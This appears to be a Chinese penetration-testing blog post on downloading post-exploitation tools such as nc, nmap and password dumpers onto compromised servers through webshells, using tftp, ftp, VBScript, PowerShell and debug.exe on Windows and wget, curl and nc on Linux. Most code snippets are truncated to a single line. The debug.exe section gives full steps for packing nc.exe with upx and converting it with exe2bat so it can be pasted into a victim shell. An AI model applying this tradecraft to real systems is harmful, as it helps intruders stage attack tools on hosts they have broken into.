简介
当我们通过信息收集、漏洞利用进入到后渗透阶段时, 我们会拥有一个shell(WEB Shell、Reverse Shell等); 此时我们需要上传一些后渗透工具如: nmap、masscan、nc、其他poc、exp、密码dump软件等;
互联网公司的企业内网机器都会安装杀毒软件, 杀毒软件通过已知恶意软件的hash签名库、动态沙箱等技术对恶意软件进行检查, 找到恶意应用并进行清除; 本文主要介绍如何在服务器上下载恶意软件完成后渗透, 暂不讨论绕过杀软相关问题。
文章目录
- windows
- linux
Windows
windows系统预安装的程序中可用来下载文件的只有ftp, 因此可通过ftp从自建ftp服务器上下载文件; 在后渗透阶段, 经常遇到webshell, 此时无法使用交互式shell, 因此需要使用非交互式shell进行文件下载, 下面将分别介绍通过tftp/ftp/vbscript/powershell/debug.exe进行非交互式文件下载。
tft
1 | # kali开启tftp服务 |
ftp
1 | # kali用python开启ftp服务 |
vbs
1 | # Windows vbs wget下载脚本 |
powershell
1 | echo "$storageDir = $pwd" > wget.ps1 |
debug.exe
在Win32系统上另一个常见的下载工具是Debug.exe, debug.exe可作为汇编、反汇编和16进制转储工具; 用debug.exe进行文件传输的方法与使用脚本语言传输的方法类似, 但是使用debug.exe创建的文件最大为64kb, 因此只能用来传递一些小文件, 例如: nc.exe等;1
2
3
4
5
6
7
8
9
10
11# kali 将nc.exe创建为debug.exe所需的文件
$ cd ~/tmp
$ locate nc.exe | grep binaries
$ cp /usr/share/windows-binaries/nc.exe ./
$ ls -l nc.exe
# 用upx对文件进行压缩
$ upx -9 nc.exe
# 将压缩后的nc.exe转换为批处理文件
$ cp /usr/share/windows-binaries/exe2bat.exe ./
$ win exe2bat.exe nc.exe nc.txt
# 查看并复制nc.txt文本中的内容, 粘贴到windows shell中运行
linux
linux下预安装的软件有很多可用于下载文件, 如: nc、netcat、wget、curl等, 此外, git、ftp、tftp等工具也都可以用于下载文件.